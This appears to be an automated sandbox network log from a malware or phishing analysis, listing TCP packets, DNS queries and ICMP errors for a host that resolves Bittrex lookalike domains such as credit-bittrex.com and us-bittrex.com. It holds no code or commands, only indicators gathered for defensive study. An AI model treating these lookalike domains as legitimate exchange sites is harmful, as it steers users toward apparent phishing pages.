                          Mar 28, 2024 15:45:29.047779083 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.047796011 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.047830105 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.047835112 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.047863007 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.047879934 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.049674988 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.049693108 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.049737930 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.049743891 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.049777985 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.049801111 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.050919056 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.050936937 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.050981998 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.050987959 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.051013947 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.051034927 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.052762985 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.052778006 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.052819014 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.052825928 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.052860975 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.052867889 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.054729939 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.054745913 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.054786921 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.054792881 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.054820061 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.054830074 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.056411028 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.056427002 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.056466103 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.056472063 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.056493998 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.056508064 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.057724953 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.057740927 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.057776928 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.057818890 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.057823896 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.057862043 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.059544086 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.059561014 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.059604883 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.059611082 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.059637070 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.059644938 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.060885906 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.061413050 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.061429977 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.061475039 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.061480045 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.061490059 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.061517954 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.063261032 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.063275099 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.063334942 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.063339949 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.063376904 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.064208031 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.064240932 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.064279079 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.064285040 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.064315081 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.064353943 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.124208927 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.124275923 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.130808115 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.130817890 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.131030083 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.132772923 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.136359930 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.153772116 CET49746443192.168.2.4172.67.150.61
                          Mar 28, 2024 15:45:29.153788090 CET44349746172.67.150.61192.168.2.4
                          Mar 28, 2024 15:45:29.176232100 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.484894037 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.484965086 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.485034943 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.613461971 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.613492966 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.613506079 CET49748443192.168.2.423.209.58.93
                          Mar 28, 2024 15:45:29.613511086 CET4434974823.209.58.93192.168.2.4
                          Mar 28, 2024 15:45:29.952042103 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:29.952076912 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:29.952166080 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:29.953027964 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:29.953049898 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.159996986 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.160288095 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:30.160310984 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.161349058 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.161396980 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:30.480695009 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:30.480849028 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.480979919 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:30.480994940 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.535875082 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:30.715459108 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.715584040 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:30.715653896 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.431102037 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.431150913 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.431333065 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.438267946 CET49751443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.438293934 CET44349751172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.438770056 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.438781977 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.535808086 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.535837889 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.535928011 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.537224054 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.537240982 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.637406111 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.637687922 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.637713909 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.638051033 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.638396978 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.638454914 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.638544083 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:31.684226036 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:31.754230022 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.754483938 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.754501104 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.755532980 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.755587101 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.756799936 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.756860971 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.757067919 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.757075071 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.801502943 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.987839937 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.987925053 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.987961054 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.988373041 CET49753443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.988389015 CET4434975335.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.989974022 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.990000963 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:31.990053892 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.990472078 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:31.990477085 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.059947968 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.059993029 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.060030937 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.060036898 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.060060978 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.060091972 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.060098886 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.060126066 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.060159922 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.061541080 CET49752443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.061554909 CET44349752172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.208470106 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.208703041 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.208714962 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.209012985 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.209404945 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.209456921 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.209552050 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.252240896 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.397020102 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.397088051 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.397156954 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.397377014 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.397394896 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.448307991 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.448467016 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.448512077 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.448659897 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.448677063 CET4434975435.190.80.1192.168.2.4
                          Mar 28, 2024 15:45:32.448693037 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.448714018 CET49754443192.168.2.435.190.80.1
                          Mar 28, 2024 15:45:32.596987009 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.597255945 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.597301006 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.598206043 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.598264933 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.598614931 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.598675966 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.598858118 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.598870039 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.646475077 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.833429098 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.833467960 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.833566904 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.833576918 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.833596945 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.833655119 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:32.833920002 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.834978104 CET49755443192.168.2.4172.67.213.53
                          Mar 28, 2024 15:45:32.834990978 CET44349755172.67.213.53192.168.2.4
                          Mar 28, 2024 15:45:37.659059048 CET44349741172.253.63.147192.168.2.4
                          Mar 28, 2024 15:45:37.659137964 CET44349741172.253.63.147192.168.2.4
                          Mar 28, 2024 15:45:37.661449909 CET49741443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:45:39.081307888 CET49741443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:45:39.081336975 CET44349741172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.389837027 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:27.389873028 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.389961958 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:27.390264988 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:27.390281916 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.597754002 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.605220079 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:27.605240107 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.605668068 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.610331059 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:27.610426903 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:27.660913944 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:31.539444923 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.539485931 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.539678097 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.539823055 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.539835930 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.747904062 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.748440027 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.748457909 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.749492884 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.749620914 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.750040054 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.750099897 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.750191927 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.750197887 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.794790983 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.980564117 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.980649948 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.980983973 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.981616974 CET49765443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.981623888 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.981635094 CET4434976535.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.981654882 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:31.981921911 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.982115984 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:31.982126951 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.194818020 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.195126057 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.195149899 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.216691017 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.217288017 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.217288017 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.217314005 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.220362902 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.270369053 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.428668022 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.428760052 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:32.428870916 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.431401968 CET49766443192.168.2.435.190.80.1
                          Mar 28, 2024 15:46:32.431420088 CET4434976635.190.80.1192.168.2.4
                          Mar 28, 2024 15:46:35.551843882 CET4972380192.168.2.472.21.81.240
                          Mar 28, 2024 15:46:35.551918030 CET4972480192.168.2.472.21.81.240
                          Mar 28, 2024 15:46:35.646285057 CET804972472.21.81.240192.168.2.4
                          Mar 28, 2024 15:46:35.646514893 CET4972480192.168.2.472.21.81.240
                          Mar 28, 2024 15:46:35.647703886 CET804972372.21.81.240192.168.2.4
                          Mar 28, 2024 15:46:35.647824049 CET4972380192.168.2.472.21.81.240
                          Mar 28, 2024 15:46:37.626441002 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:37.626507044 CET44349764172.253.63.147192.168.2.4
                          Mar 28, 2024 15:46:37.629753113 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:39.068813086 CET49764443192.168.2.4172.253.63.147
                          Mar 28, 2024 15:46:39.068836927 CET44349764172.253.63.147192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 28, 2024 15:45:23.013859987 CET53587941.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:23.024403095 CET53644491.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:23.622391939 CET53516021.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:24.577310085 CET6518553192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:24.577454090 CET4929953192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:24.677237988 CET53651851.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:24.677258968 CET53492991.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:25.322139025 CET5781953192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:25.322335005 CET5080053192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:25.418797970 CET53578191.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:25.423036098 CET53508001.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:25.766213894 CET5076753192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:25.766977072 CET5622753192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:25.866486073 CET53507671.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:25.867207050 CET53562271.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:26.552530050 CET6338153192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:26.553273916 CET5498153192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:26.651817083 CET53549811.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:26.652614117 CET53633811.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:27.177364111 CET5634653192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:27.177589893 CET5309753192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:27.272908926 CET53530971.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:27.274605989 CET53563461.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:27.776536942 CET5322453192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:27.776905060 CET5575353192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:27.875653982 CET53557531.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:27.876560926 CET53532241.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:29.583800077 CET53552271.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:29.670209885 CET4972253192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:29.670720100 CET5600253192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:29.837251902 CET53560021.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:29.951184034 CET53497221.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:31.439682961 CET5799853192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:31.440083981 CET5714353192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:31.534735918 CET53571431.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:31.535310984 CET53579981.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:32.067950010 CET5965953192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:32.068145990 CET5511853192.168.2.41.1.1.1
                          Mar 28, 2024 15:45:32.335678101 CET53596591.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:32.428212881 CET53551181.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:42.325922966 CET53560491.1.1.1192.168.2.4
                          Mar 28, 2024 15:45:47.120098114 CET138138192.168.2.4192.168.2.255
                          Mar 28, 2024 15:46:01.374238014 CET53558631.1.1.1192.168.2.4
                          Mar 28, 2024 15:46:22.544970989 CET53627871.1.1.1192.168.2.4
                          Mar 28, 2024 15:46:24.008198977 CET53596931.1.1.1192.168.2.4
                          Mar 28, 2024 15:46:31.443276882 CET5061753192.168.2.41.1.1.1
                          Mar 28, 2024 15:46:31.443276882 CET5107553192.168.2.41.1.1.1
                          Mar 28, 2024 15:46:31.538175106 CET53506171.1.1.1192.168.2.4
                          Mar 28, 2024 15:46:31.539011955 CET53510751.1.1.1192.168.2.4
                          Mar 28, 2024 15:46:50.694853067 CET53516491.1.1.1192.168.2.4
                          TimestampSource IPDest IPChecksumCodeType
                          Mar 28, 2024 15:45:26.652678967 CET192.168.2.41.1.1.1c204(Port unreachable)Destination Unreachable
                          Mar 28, 2024 15:45:32.428292036 CET192.168.2.41.1.1.1c230(Port unreachable)Destination Unreachable
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 28, 2024 15:45:24.577310085 CET192.168.2.41.1.1.10xa8f6Standard query (0)credit-bittrex.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:24.577454090 CET192.168.2.41.1.1.10x6e61Standard query (0)credit-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:25.322139025 CET192.168.2.41.1.1.10x3d5fStandard query (0)credit-bittrex.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.322335005 CET192.168.2.41.1.1.10x8547Standard query (0)credit-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:25.766213894 CET192.168.2.41.1.1.10xac6cStandard query (0)us-bittrex.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.766977072 CET192.168.2.41.1.1.10xa88Standard query (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:26.552530050 CET192.168.2.41.1.1.10x762aStandard query (0)us-bittrex.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:26.553273916 CET192.168.2.41.1.1.10x7a66Standard query (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:27.177364111 CET192.168.2.41.1.1.10x30c5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.177589893 CET192.168.2.41.1.1.10xeb82Standard query (0)www.google.com65IN (0x0001)false
                          Mar 28, 2024 15:45:27.776536942 CET192.168.2.41.1.1.10xe83Standard query (0)us-bittrex.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.776905060 CET192.168.2.41.1.1.10x6a26Standard query (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:29.670209885 CET192.168.2.41.1.1.10xfea1Standard query (0)zhu-ni-hao-yun.shA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:29.670720100 CET192.168.2.41.1.1.10x29dfStandard query (0)zhu-ni-hao-yun.sh65IN (0x0001)false
                          Mar 28, 2024 15:45:31.439682961 CET192.168.2.41.1.1.10x115aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:31.440083981 CET192.168.2.41.1.1.10xb242Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                          Mar 28, 2024 15:45:32.067950010 CET192.168.2.41.1.1.10x79f9Standard query (0)zhu-ni-hao-yun.shA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:32.068145990 CET192.168.2.41.1.1.10xf074Standard query (0)zhu-ni-hao-yun.sh65IN (0x0001)false
                          Mar 28, 2024 15:46:31.443276882 CET192.168.2.41.1.1.10xcd46Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                          Mar 28, 2024 15:46:31.443276882 CET192.168.2.41.1.1.10x3caeStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 28, 2024 15:45:24.677237988 CET1.1.1.1192.168.2.40xa8f6No error (0)credit-bittrex.com172.67.150.105A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:24.677237988 CET1.1.1.1192.168.2.40xa8f6No error (0)credit-bittrex.com104.21.11.221A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:24.677258968 CET1.1.1.1192.168.2.40x6e61No error (0)credit-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:25.418797970 CET1.1.1.1192.168.2.40x3d5fNo error (0)credit-bittrex.com172.67.150.105A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.418797970 CET1.1.1.1192.168.2.40x3d5fNo error (0)credit-bittrex.com104.21.11.221A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.423036098 CET1.1.1.1192.168.2.40x8547No error (0)credit-bittrex.com65IN (0x0001)false
